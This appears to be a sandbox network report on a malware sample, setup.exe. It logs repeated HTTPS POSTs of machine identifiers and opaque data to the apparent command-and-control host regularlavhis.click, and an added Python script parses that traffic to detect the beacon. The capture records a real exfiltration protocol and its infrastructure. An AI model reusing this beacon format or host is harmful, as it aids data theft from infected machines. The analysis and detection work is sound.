                                                                                                                        2025-01-06 14:40:24 UTC1369INData Raw: 51 71 47 75 59 52 41 35 7a 57 42 71 6e 6a 59 79 4e 59 42 35 47 6e 6a 55 68 69 48 52 5a 4a 49 42 51 78 47 7a 43 5a 68 42 51 56 49 53 5a 6e 35 6d 6b 43 2f 4e 63 47 35 62 74 6a 33 68 46 36 30 4c 61 30 52 57 59 67 4c 79 52 6f 61 47 45 4c 4b 4a 6d 6f 38 49 57 49 62 67 61 65 41 51 70 68 34 6e 66 77 31 6d 2f 58 44 4f 4d 70 48 73 52 74 49 69 45 66 6d 44 77 55 53 66 2b 49 53 50 41 55 50 44 53 2b 46 6f 59 42 41 35 7a 57 42 71 6e 6a 59 79 4e 59 42 35 47 6e 68 4d 46 2b 47 43 59 6f 58 52 67 63 42 79 6d 56 31 55 56 45 50 47 38 62 76 77 30 65 71 5a 34 76 73 49 34 37 6d 67 7a 6a 4b 52 37 45 62 53 49 68 48 2b 77 55 4d 43 46 54 66 4e 53 6f 38 49 57 49 62 67 61 65 41 51 6f 78 50 32 39 73 32 6d 2b 58 4b 41 62 51 6b 34 77 51 59 30 30 58 6e 47 67 38 4f 51 70 34 41 46 30 41 75
                                                                                                                        Data Ascii: QqGuYRA5zWBqnjYyNYB5GnjUhiHRZJIBQxGzCZhBQVISZn5mkC/NcG5btj3hF60La0RWYgLyRoaGELKJmo8IWIbgaeAQph4nfw1m/XDOMpHsRtIiEfmDwUSf+ISPAUPDS+FoYBA5zWBqnjYyNYB5GnhMF+GCYoXRgcBymV1UVEPG8bvw0eqZ4vsI47mgzjKR7EbSIhH+wUMCFTfNSo8IWIbgaeAQoxP29s2m+XKAbQk4wQY00XnGg8OQp4AF0Au


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49751 | 104.21.96.1 | 443 | 7468 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 14:40:24 UTC | 277 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=1NOJGNEGR5
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 18114
    Host: regularlavhis.click
2025-01-06 14:40:24 UTC | 15331 | OUT | Data Raw: 2d 2d 31 4e 4f 4a 47 4e 45 47 52 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 34 45 30 33 36 45 36 46 33 31 46 32 37 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 31 4e 4f 4a 47 4e 45 47 52 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 4e 4f 4a 47 4e 45 47 52 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 31 4e 4f 4a 47 4e 45 47 52 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44
    Data Ascii: --1NOJGNEGR5Content-Disposition: form-data; name="hwid"C04E036E6F31F2708EEA336AD54C4C07--1NOJGNEGR5Content-Disposition: form-data; name="pid"2--1NOJGNEGR5Content-Disposition: form-data; name="lid"hRjzG3--ALFA--1NOJGNEGR5Content-D
2025-01-06 14:40:24 UTC | 2783 | OUT | Data Raw: 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9
    Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_
2025-01-06 14:40:25 UTC | 1130 | IN | HTTP/1.1 200 OK
    Date: Mon, 06 Jan 2025 14:40:25 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=n3dqff93st9c6qdj95q14csvmq; expires=Fri, 02 May 2025 08:27:04 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DeL9kTW5RGtCnqNKQsaZcYJUiyZB8eJ%2Fyj28qmsj17yQBomHPr%2FoJchv%2FE2D4Nc4CKc1q4Lm3Ec80JIgKFJExbt2v553OsqifZ46pQVDXOEcIiDYsKlK85XiPotFeHm4aRGZqFmm"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fdc768abadec32e-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2298&min_rtt=1752&rtt_var=1047&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2849&recv_bytes=19071&delivery_rate=1666666&cwnd=178&unsent_bytes=0&cid=07d254eddd440a56&ts=794&x=0"
2025-01-06 14:40:25 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-06 14:40:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49752 | 104.21.96.1 | 443 | 7468 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 14:40:26 UTC | 279 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=MI2ER9LNNQ37X
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8753
    Host: regularlavhis.click
2025-01-06 14:40:26 UTC | 8753 | OUT | Data Raw: 2d 2d 4d 49 32 45 52 39 4c 4e 4e 51 33 37 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 34 45 30 33 36 45 36 46 33 31 46 32 37 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 4d 49 32 45 52 39 4c 4e 4e 51 33 37 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 49 32 45 52 39 4c 4e 4e 51 33 37 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 4d 49 32 45 52 39 4c 4e 4e 51 33 37
    Data Ascii: --MI2ER9LNNQ37XContent-Disposition: form-data; name="hwid"C04E036E6F31F2708EEA336AD54C4C07--MI2ER9LNNQ37XContent-Disposition: form-data; name="pid"2--MI2ER9LNNQ37XContent-Disposition: form-data; name="lid"hRjzG3--ALFA--MI2ER9LNNQ37
2025-01-06 14:40:26 UTC | 1133 | IN | HTTP/1.1 200 OK
    Date: Mon, 06 Jan 2025 14:40:26 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=ib981kskg5s9qmrbcja6gdujka; expires=Fri, 02 May 2025 08:27:05 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gurDcMTql48nQb%2FBg9t6VgMBDOGZvFAk0p2c8W5bnVQUK12vf2%2FbeoIKu%2F800%2F8PDQ7ly6qoiJDVH5PqutuwQP4Q6k0KKJFkyu0H0yHcNafjGMLgJFg%2BnZmsD4XoD4YNCb8%2BLExC"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fdc76933dd5c32e-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1632&rtt_var=647&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2849&recv_bytes=9690&delivery_rate=1647855&cwnd=178&unsent_bytes=0&cid=6fcc030e8823641c&ts=654&x=0"
2025-01-06 14:40:26 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-06 14:40:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49753 | 104.21.96.1 | 443 | 7468 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 14:40:27 UTC | 278 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=EKN0MGNIX3D
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20394
    Host: regularlavhis.click
2025-01-06 14:40:27 UTC | 15331 | OUT | Data Raw: 2d 2d 45 4b 4e 30 4d 47 4e 49 58 33 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 34 45 30 33 36 45 36 46 33 31 46 32 37 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 45 4b 4e 30 4d 47 4e 49 58 33 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 4b 4e 30 4d 47 4e 49 58 33 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 45 4b 4e 30 4d 47 4e 49 58 33 44 0d 0a 43 6f 6e 74 65
    Data Ascii: --EKN0MGNIX3DContent-Disposition: form-data; name="hwid"C04E036E6F31F2708EEA336AD54C4C07--EKN0MGNIX3DContent-Disposition: form-data; name="pid"3--EKN0MGNIX3DContent-Disposition: form-data; name="lid"hRjzG3--ALFA--EKN0MGNIX3DConte
2025-01-06 14:40:27 UTC | 5063 | OUT | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1
    Data Ascii: lrQMn 64F6(X&7~`aO@
2025-01-06 14:40:28 UTC | 1133 | IN | HTTP/1.1 200 OK
    Date: Mon, 06 Jan 2025 14:40:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=pfdpo51khipnev8nggflar68m1; expires=Fri, 02 May 2025 08:27:06 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2xuuJHhTZH9MGDBfh7TvplmwS0uHYpHGbTZE4mWVoAxWbPsUFK1J%2FPCKSX4G3JGECpq5plONrJatfq6bIap9L%2BP3J9KYn5dooQ1b%2FBLwi%2BDK8AdwdlZRgkjdz17MbZY%2FdgkZua8E"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fdc769bcbd372a4-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1949&rtt_var=751&sent=18&recv=27&lost=0&retrans=0&sent_bytes=2849&recv_bytes=21352&delivery_rate=1437715&cwnd=212&unsent_bytes=0&cid=ecd10da85ae827ff&ts=713&x=0"
2025-01-06 14:40:28 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-06 14:40:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
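Sessions 2 to 4 above are the same exchange repeated: a POST to /api on regularlavhis.click with a browser User-Agent, a multipart/form-data body whose first three parts are hwid, pid and lid (hwid and lid identical each time, pid changing between 2 and 3), a fourth part that the report truncates, and a chunked reply whose 20-byte first chunk is the size line "f" (15) followed by "ok 8.46.123.189" and whose 5-byte second chunk is the terminating "0". The byte counts in the report also add up to the Content-Length header (15331 + 2783 = 18114; 15331 + 5063 = 20394), so the report shows the complete request body in each case. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that parses a request of this shape, checks it against the observed field set and decodes the reply. The request and response it runs on are constructed from the captured values; since the fourth part's name and content are not visible in the report, the example stands in a part named "payload" (an assumption) seeded with the first four bytes of the captured 2783-byte chunk.

```python
import re

def parse_http(raw: bytes):
    """Split a raw HTTP/1.1 message into (start line, lowercased header map, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {part name: part body} for a multipart/form-data body (RFC 7578 framing)."""
    delimiter = b"--" + boundary.encode()
    parts = {}
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):        # closing delimiter "--boundary--"
            break
        if chunk.startswith(b"\r\n"):      # CRLF that ends the delimiter line
            chunk = chunk[2:]
        part_head, _, part_body = chunk.partition(b"\r\n\r\n")
        m = re.search(rb'[;\s]name="([^"]*)"', part_head)
        if m is None:
            continue
        if part_body.endswith(b"\r\n"):    # CRLF that precedes the next delimiter
            part_body = part_body[:-2]
        parts[m.group(1).decode()] = part_body
    return parts

def decode_chunked(body: bytes) -> bytes:
    """Decode a Transfer-Encoding: chunked body; b'f\\r\\nok ...\\r\\n0\\r\\n\\r\\n' -> b'ok ...'."""
    out, pos = bytearray(), 0
    while True:
        line_end = body.index(b"\r\n", pos)
        size = int(body[pos:line_end].split(b";")[0], 16)   # chunk-size; extensions ignored
        if size == 0:
            return bytes(out)
        start = line_end + 2
        out += body[start:start + size]
        pos = start + size + 2                               # skip the CRLF after the chunk

BEACON_FIELDS = {"hwid", "pid", "lid"}   # the three parts present in every captured POST

def classify_beacon(raw_request: bytes):
    """Return the identifiers of a request matching the captured shape, or None."""
    start_line, headers, body = parse_http(raw_request)
    words = start_line.split(" ")
    ctype = headers.get("content-type", "")
    m = re.search(r"boundary=([^;\s]+)", ctype)
    if len(words) < 2 or words[0] != "POST" or not ctype.startswith("multipart/form-data") or m is None:
        return None
    fields = parse_multipart(body, m.group(1))
    if not BEACON_FIELDS.issubset(fields):
        return None
    return {
        "host": headers.get("host"),
        "target": words[1],
        "hwid": fields["hwid"].decode("latin-1"),
        "pid": fields["pid"].decode("latin-1"),
        "lid": fields["lid"].decode("latin-1"),
        "other_parts": sorted(set(fields) - BEACON_FIELDS),
        "length_matches": len(body) == int(headers.get("content-length", "-1")),
    }

def parse_reply(raw_response: bytes):
    """Return (status word, IPv4 string) from a reply body of the form 'ok <ip>', or None."""
    _, headers, body = parse_http(raw_response)
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = decode_chunked(body)
    m = re.fullmatch(rb"(\w+) (\d{1,3}(?:\.\d{1,3}){3})", body.strip())
    return None if m is None else (m.group(1).decode(), m.group(2).decode())

# Constructed sample built from the values in session 2. The report truncates the
# part after "lid", so a placeholder part named "payload" (an assumption) stands in,
# seeded with the first four bytes of the captured 2783-byte chunk.
BOUNDARY = "1NOJGNEGR5"
SAMPLE_BODY = (
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="hwid"\r\n\r\nC04E036E6F31F2708EEA336AD54C4C07\r\n'
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="pid"\r\n\r\n2\r\n'
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="lid"\r\n\r\nhRjzG3--ALFA\r\n'
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="payload"\r\n\r\n\x15\x2e\xa7\x07PLACEHOLDER\r\n'
    f'--{BOUNDARY}--\r\n'
).encode("latin-1")
SAMPLE_REQUEST = (
    f"POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    f"Content-Length: {len(SAMPLE_BODY)}\r\nHost: regularlavhis.click\r\n\r\n"
).encode("latin-1") + SAMPLE_BODY
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\n"
    b"Connection: close\r\n\r\nf\r\nok 8.46.123.189\r\n0\r\n\r\n"
)

if __name__ == "__main__":
    print(classify_beacon(SAMPLE_REQUEST))
    print(parse_reply(SAMPLE_RESPONSE))
```

Run over decrypted HTTP streams exported from a proxy or sandbox, classify_beacon yields the hwid/lid pair that ties the four sessions together and the names of whatever parts follow them; the multipart parser splits on the full "--boundary" delimiter rather than on "--", which matters here because the lid value "hRjzG3--ALFA" itself contains a double hyphen. The User-Agent and the Cloudflare response headers are deliberately not part of the match, since both are shared with ordinary browser traffic; the field triple, the fixed /api path and the "ok <ip>" reply are the parts of the exchange that stay constant across sessions.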


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49754 | 104.21.96.1 | 443 | 7468 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 14:40:28 UTC | 278 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=S5OQLYS040ZL
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1212
    Host: regularlavhis.click
2025-01-06 14:40:28 UTC | 1212 | OUT | Data Raw: 2d 2d 53 35 4f 51 4c 59 53 30 34 30 5a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 34 45 30 33 36 45 36 46 33 31 46 32 37 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 53 35 4f 51 4c 59 53 30 34 30 5a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 35 4f 51 4c 59 53 30 34 30 5a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 53 35 4f 51 4c 59 53 30 34 30 5a 4c 0d 0a 43
    Data Ascii: --S5OQLYS040ZLContent-Disposition: form-data; name="hwid"C04E036E6F31F2708EEA336AD54C4C07--S5OQLYS040ZLContent-Disposition: form-data; name="pid"1--S5OQLYS040ZLContent-Disposition: form-data; name="lid"hRjzG3--ALFA--S5OQLYS040ZLC
2025-01-06 14:40:29 UTC | 1124 | IN | HTTP/1.1 200 OK
    Date: Mon, 06 Jan 2025 14:40:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=nnl2hu3snuovlf28aj01qk8o80; expires=Fri, 02 May 2025 08:27:08 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H7v1gwpOlzHwJtn4GZw5XLILSkI7tzq5rd%2FdtFT2yOJsMVh5EeFrz4kBZexHsTDmj3vldNfXtKRNVV2o05iPux0mEhT%2BmnFrO9Mgjw0kbdl3XiPK4ntBqnVSAsaz0tVRinMGv7ju"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8fdc76a47f6dc32e-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1660&rtt_var=622&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=2126&delivery_rate=1757977&cwnd=178&unsent_bytes=0&cid=7a0426c09b3cda91&ts=445&x=0"
2025-01-06 14:40:29 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                        Data Ascii: fok 8.46.123.189
2025-01-06 14:40:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


Session ID: 6
Source IP: 192.168.2.4
Source Port: 49755
Destination IP: 104.21.96.1
Destination Port: 443
PID: 7468
Process: C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 14:40:29 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: multipart/form-data; boundary=CKYY1BGZ
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 1042
                                                                                                                        Host: regularlavhis.click
2025-01-06 14:40:29 UTC | 1042 | OUT | Data Raw: 2d 2d 43 4b 59 59 31 42 47 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 34 45 30 33 36 45 36 46 33 31 46 32 37 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 43 4b 59 59 31 42 47 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 4b 59 59 31 42 47 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 43 4b 59 59 31 42 47 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                        Data Ascii: --CKYY1BGZContent-Disposition: form-data; name="hwid"C04E036E6F31F2708EEA336AD54C4C07--CKYY1BGZContent-Disposition: form-data; name="pid"1--CKYY1BGZContent-Disposition: form-data; name="lid"hRjzG3--ALFA--CKYY1BGZContent-Dispositi
2025-01-06 14:40:30 UTC | 1130 | IN | HTTP/1.1 200 OK
                                                                                                                        Date: Mon, 06 Jan 2025 14:40:30 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=dert5qdci100b50ihamj13vso4; expires=Fri, 02 May 2025 08:27:09 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                        vary: accept-encoding
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NzEGlwvgCe4R61KALNAA%2FFvhHeWE1vE2Yfi5z%2BITMgPmFXOWn%2BdvfdRbQFJ8z989sJIZV2hpDnhVvsknqeotMxUN5KjP8bjFKvQS1psWDF1plvh27THC9%2Fd7gLfhFj0eFMr525%2BX"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8fdc76aaaa69de9a-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
